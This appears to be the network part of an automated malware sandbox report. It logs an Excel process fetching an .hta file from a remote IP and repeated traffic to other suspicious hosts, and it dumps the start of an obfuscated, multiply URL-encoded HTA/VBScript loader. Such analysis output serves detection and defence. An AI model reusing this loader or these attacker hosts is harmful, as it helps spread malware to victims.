                                                                                            Oct 25, 2024 19:52:18.594309092 CEST804919894.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:19.554600954 CEST804919894.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:19.554707050 CEST4919880192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:19.560466051 CEST804919894.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:19.560527086 CEST4919880192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:19.683615923 CEST4919980192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:19.689152002 CEST804919994.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:19.689254045 CEST4919980192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:19.690922976 CEST4919980192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:19.696383953 CEST804919994.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:19.696573019 CEST4919980192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:19.701917887 CEST804919994.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:20.718924046 CEST804919994.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:20.719022989 CEST4919980192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:20.735096931 CEST804919994.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:20.735146999 CEST4919980192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:20.851991892 CEST4920080192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:20.857407093 CEST804920094.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:20.857486010 CEST4920080192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:20.859158039 CEST4920080192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:20.864531994 CEST804920094.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:20.864617109 CEST4920080192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:20.870174885 CEST804920094.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:21.835601091 CEST804920094.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:21.835783958 CEST4920080192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:21.842412949 CEST804920094.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:21.842585087 CEST4920080192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:21.984102011 CEST4920180192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:21.989552021 CEST804920194.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:21.989630938 CEST4920180192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:21.991240025 CEST4920180192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:21.996630907 CEST804920194.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:21.996702909 CEST4920180192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:22.002753019 CEST804920194.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:22.952907085 CEST804920194.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:22.953058004 CEST4920180192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:22.959302902 CEST804920194.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:22.959388971 CEST4920180192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:23.130486965 CEST4920280192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:23.136182070 CEST804920294.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:23.136254072 CEST4920280192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:23.137924910 CEST4920280192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:23.143918991 CEST804920294.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:23.143979073 CEST4920280192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:23.149430990 CEST804920294.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:24.369417906 CEST804920294.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:24.369508028 CEST4920280192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:24.370764017 CEST804920294.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:24.370796919 CEST804920294.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:24.370810032 CEST4920280192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:24.370846033 CEST4920280192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:24.381623983 CEST804920294.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:24.526592016 CEST4920380192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:24.532033920 CEST804920394.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:24.532087088 CEST4920380192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:24.533739090 CEST4920380192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:24.540059090 CEST804920394.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:24.540107965 CEST4920380192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:24.545777082 CEST804920394.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:25.509913921 CEST804920394.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:25.510015011 CEST4920380192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:25.516182899 CEST804920394.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:25.516287088 CEST4920380192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:25.711813927 CEST4920480192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:25.717499018 CEST804920494.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:25.717600107 CEST4920480192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:25.733125925 CEST4920480192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:25.739912033 CEST804920494.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:25.739974022 CEST4920480192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:25.745405912 CEST804920494.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:26.666554928 CEST804920494.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:26.666692972 CEST4920480192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:26.672544956 CEST804920494.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:26.672635078 CEST4920480192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:26.817382097 CEST4920580192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:26.822873116 CEST804920594.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:26.822938919 CEST4920580192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:26.825233936 CEST4920580192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:26.830789089 CEST804920594.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:26.830845118 CEST4920580192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:26.836292982 CEST804920594.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:27.798177958 CEST804920594.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:27.802866936 CEST4920580192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:27.808891058 CEST804920594.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:27.808971882 CEST4920580192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:27.946774960 CEST4920680192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:27.952367067 CEST804920694.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:27.952433109 CEST4920680192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:27.954771996 CEST4920680192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:27.960144997 CEST804920694.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:27.960200071 CEST4920680192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:27.965538025 CEST804920694.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:28.944343090 CEST804920694.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:28.944598913 CEST4920680192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:28.951443911 CEST804920694.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:28.951517105 CEST4920680192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:29.076658010 CEST4920780192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:29.082257032 CEST804920794.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:29.082334042 CEST4920780192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:29.084017992 CEST4920780192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:29.089411020 CEST804920794.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:29.089464903 CEST4920780192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:29.094902992 CEST804920794.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:30.087476015 CEST804920794.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:30.087565899 CEST4920780192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:30.093255043 CEST804920794.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:30.093343973 CEST4920780192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:30.226310015 CEST4920880192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:30.231952906 CEST804920894.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:30.232069016 CEST4920880192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:30.233679056 CEST4920880192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:30.239028931 CEST804920894.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:30.239135981 CEST4920880192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:30.244529963 CEST804920894.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:31.199507952 CEST804920894.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:31.199980021 CEST4920880192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:31.205724001 CEST804920894.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:31.205822945 CEST4920880192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:31.336209059 CEST4920980192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:31.341694117 CEST804920994.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:31.341759920 CEST4920980192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:31.343420982 CEST4920980192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:31.348896027 CEST804920994.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:31.348968029 CEST4920980192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:31.354439974 CEST804920994.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:32.292700052 CEST804920994.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:32.292783976 CEST4920980192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:32.298660040 CEST804920994.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:32.298746109 CEST4920980192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:32.426906109 CEST4921080192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:32.432423115 CEST804921094.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:32.432638884 CEST4921080192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:32.434194088 CEST4921080192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:32.440407991 CEST804921094.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:32.440484047 CEST4921080192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:32.445787907 CEST804921094.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:33.403844118 CEST804921094.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:33.404036999 CEST4921080192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:33.410305023 CEST804921094.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:33.410445929 CEST4921080192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:33.537256956 CEST4921180192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:33.542845011 CEST804921194.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:33.542954922 CEST4921180192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:33.544646025 CEST4921180192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:33.550153971 CEST804921194.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:33.550208092 CEST4921180192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:33.555716991 CEST804921194.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:34.518452883 CEST804921194.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:34.518596888 CEST4921180192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:34.524336100 CEST804921194.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:34.524435997 CEST4921180192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:34.664452076 CEST4921280192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:34.671149969 CEST804921294.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:34.671222925 CEST4921280192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:34.673525095 CEST4921280192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:34.679011106 CEST804921294.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:34.679063082 CEST4921280192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:34.684714079 CEST804921294.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:35.658840895 CEST804921294.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:35.658929110 CEST4921280192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:35.664690018 CEST804921294.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:35.664750099 CEST4921280192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:36.572334051 CEST4921380192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:36.577811003 CEST804921394.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:36.577873945 CEST4921380192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:36.579443932 CEST4921380192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:36.585088015 CEST804921394.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:36.585141897 CEST4921380192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:36.590554953 CEST804921394.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:37.677767038 CEST804921394.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:37.678244114 CEST4921380192.168.2.2294.156.177.220
                                                                                            Oct 25, 2024 19:52:37.684228897 CEST804921394.156.177.220192.168.2.22
                                                                                            Oct 25, 2024 19:52:37.684364080 CEST4921380192.168.2.2294.156.177.220
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Oct 25, 2024 19:50:44.185312033 CEST5456253192.168.2.228.8.8.8
                                                                                            Oct 25, 2024 19:50:44.193473101 CEST53545628.8.8.8192.168.2.22
                                                                                            Oct 25, 2024 19:50:47.202464104 CEST5291753192.168.2.228.8.8.8
                                                                                            Oct 25, 2024 19:50:47.213831902 CEST53529178.8.8.8192.168.2.22
                                                                                            Oct 25, 2024 19:50:47.214359999 CEST5291753192.168.2.228.8.8.8
                                                                                            Oct 25, 2024 19:50:47.222008944 CEST53529178.8.8.8192.168.2.22
                                                                                            Oct 25, 2024 19:51:07.097786903 CEST6275153192.168.2.228.8.8.8
                                                                                            Oct 25, 2024 19:51:07.130610943 CEST53627518.8.8.8192.168.2.22
                                                                                            Oct 25, 2024 19:51:26.427962065 CEST5789353192.168.2.228.8.8.8
                                                                                            Oct 25, 2024 19:51:26.437589884 CEST53578938.8.8.8192.168.2.22
                                                                                            Oct 25, 2024 19:51:27.900490999 CEST5482153192.168.2.228.8.8.8
                                                                                            Oct 25, 2024 19:51:27.917004108 CEST53548218.8.8.8192.168.2.22
                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Oct 25, 2024 19:50:44.185312033 CEST192.168.2.228.8.8.80xdcc7Standard query (0)qrisni.meA (IP address)IN (0x0001)false
                                                                                            Oct 25, 2024 19:50:47.202464104 CEST192.168.2.228.8.8.80x79e4Standard query (0)qrisni.meA (IP address)IN (0x0001)false
                                                                                            Oct 25, 2024 19:50:47.214359999 CEST192.168.2.228.8.8.80x79e4Standard query (0)qrisni.meA (IP address)IN (0x0001)false
                                                                                            Oct 25, 2024 19:51:07.097786903 CEST192.168.2.228.8.8.80xf3baStandard query (0)qrisni.meA (IP address)IN (0x0001)false
                                                                                            Oct 25, 2024 19:51:26.427962065 CEST192.168.2.228.8.8.80x6927Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                            Oct 25, 2024 19:51:27.900490999 CEST192.168.2.228.8.8.80x20a7Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Oct 25, 2024 19:50:44.193473101 CEST8.8.8.8192.168.2.220xdcc7No error (0)qrisni.me188.114.97.3A (IP address)IN (0x0001)false
                                                                                            Oct 25, 2024 19:50:44.193473101 CEST8.8.8.8192.168.2.220xdcc7No error (0)qrisni.me188.114.96.3A (IP address)IN (0x0001)false
                                                                                            Oct 25, 2024 19:50:47.213831902 CEST8.8.8.8192.168.2.220x79e4No error (0)qrisni.me188.114.97.3A (IP address)IN (0x0001)false
                                                                                            Oct 25, 2024 19:50:47.213831902 CEST8.8.8.8192.168.2.220x79e4No error (0)qrisni.me188.114.96.3A (IP address)IN (0x0001)false
                                                                                            Oct 25, 2024 19:50:47.222008944 CEST8.8.8.8192.168.2.220x79e4No error (0)qrisni.me188.114.97.3A (IP address)IN (0x0001)false
                                                                                            Oct 25, 2024 19:50:47.222008944 CEST8.8.8.8192.168.2.220x79e4No error (0)qrisni.me188.114.96.3A (IP address)IN (0x0001)false
                                                                                            Oct 25, 2024 19:51:07.130610943 CEST8.8.8.8192.168.2.220xf3baNo error (0)qrisni.me188.114.97.3A (IP address)IN (0x0001)false
                                                                                            Oct 25, 2024 19:51:07.130610943 CEST8.8.8.8192.168.2.220xf3baNo error (0)qrisni.me188.114.96.3A (IP address)IN (0x0001)false
                                                                                            Oct 25, 2024 19:51:26.437589884 CEST8.8.8.8192.168.2.220x6927No error (0)drive.google.com142.250.186.46A (IP address)IN (0x0001)false
                                                                                            Oct 25, 2024 19:51:27.917004108 CEST8.8.8.8192.168.2.220x20a7No error (0)drive.usercontent.google.com142.250.186.161A (IP address)IN (0x0001)false
                                                                                            • qrisni.me
                                                                                            • drive.google.com
                                                                                            • drive.usercontent.google.com
                                                                                            • 192.3.176.141
                                                                                            • 94.156.177.220
                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.2249164192.3.176.141803556C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:50:45.811971903 CEST374OUTGET /41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta HTTP/1.1
                                                                                            Accept: */*
                                                                                            UA-CPU: AMD64
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                            Host: 192.3.176.141
                                                                                            Connection: Keep-Alive
                                                                                            Oct 25, 2024 19:50:46.487555981 CEST1236INHTTP/1.1 200 OK
                                                                                            Date: Fri, 25 Oct 2024 17:50:45 GMT
                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                            Last-Modified: Fri, 25 Oct 2024 04:20:14 GMT
                                                                                            ETag: "33147-625456f86fad3"
                                                                                            Accept-Ranges: bytes
                                                                                            Content-Length: 209223
                                                                                            Keep-Alive: timeout=5, max=100
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: application/hta
                                                                                            Data Raw: 3c 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 33 43 73 63 72 69 70 74 25 32 30 6c 61 6e 67 75 61 67 65 25 33 44 4a 61 76 61 53 63 72 69 70 74 25 33 45 6d 25 33 44 25 32 37 25 32 35 33 43 73 63 72 69 70 74 25 32 35 32 30 6c 61 6e 67 75 61 67 65 25 32 35 33 44 4a 61 76 61 53 63 72 69 70 74 25 32 35 33 45 6d 25 32 35 33 44 25 32 35 32 37 25 32 35 32 35 33 43 73 63 72 69 70 74 25 32 35 32 35 32 30 6c 61 6e 67 75 61 67 65 25 32 35 32 35 33 44 4a 61 76 61 53 63 72 69 70 74 25 32 35 32 35 33 45 6d 25 32 35 32 35 33 44 25 32 35 32 35 32 37 25 32 35 32 35 32 35 33 43 73 63 72 69 70 74 25 32 35 32 35 32 35 32 30 6c 61 6e 67 75 61 67 65 25 32 35 32 35 32 35 33 44 4a 61 76 61 53 63 72 69 70 74 25 32 35 32 35 32 35 33 45 6d 25 32 35 32 35 32 35 33 44 25 32 35 32 35 32 35 32 37 25 32 35 32 35 32 35 32 35 33 43 25 32 35 32 35 32 35 32 35 32 31 44 4f 43 54 59 50 45 25 32 35 32 35 32 35 32 35 32 30 68 74 6d 6c 25 32 35 32 35 32 35 32 35 [TRUNCATED]
                                                                                            Data Ascii: <script>...document.write(unescape("%3Cscript%20language%3DJavaScript%3Em%3D%27%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253Cscript%252520language%25253DJavaScript%25253Em%25253D%252527%2525253Cscript%25252520language%2525253DJavaScript%2525253Em%2525253D%25252527%252525253C%2525252521DOCTYPE%2525252520html%252525253E%252525250A%252525253Cmeta%2525252520http-equiv%252525253D%2525252522X-UA-Compatible%2525252522%2525252520content%252525253D%2525252522IE%252525253DEmulateIE8%2525252522%2525252520%252525253E%252525250A%252525253Chtml%252525253E%252525250A%252525253Cbody%252525253E%252525250A%252525253CSCript%2525252520TYpe%252525253D%2525252522tExt/VbscRiPt%2525252522%252525253E%252525250ADiM%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%252525252
                                                                                            Oct 25, 2024 19:50:46.487637997 CEST1236INData Raw: 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32
                                                                                            Data Ascii: 0%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520
                                                                                            Oct 25, 2024 19:50:46.487667084 CEST1236INData Raw: 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32
                                                                                            Data Ascii: 25252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%252
                                                                                            Oct 25, 2024 19:50:46.487766981 CEST1236INData Raw: 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25
                                                                                            Data Ascii: 2520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252
                                                                                            Oct 25, 2024 19:50:46.487777948 CEST848INData Raw: 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35
                                                                                            Data Ascii: 525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%25
                                                                                            Oct 25, 2024 19:50:46.487890005 CEST1236INData Raw: 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32
                                                                                            Data Ascii: 25252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%252
                                                                                            Oct 25, 2024 19:50:46.487935066 CEST1236INData Raw: 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25
                                                                                            Data Ascii: 2520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252
                                                                                            Oct 25, 2024 19:50:46.487946033 CEST1236INData Raw: 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35
                                                                                            Data Ascii: %2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%
                                                                                            Oct 25, 2024 19:50:46.487993956 CEST1236INData Raw: 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35
                                                                                            Data Ascii: 5252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525
                                                                                            Oct 25, 2024 19:50:46.487999916 CEST1236INData Raw: 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32
                                                                                            Data Ascii: 520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%25252525
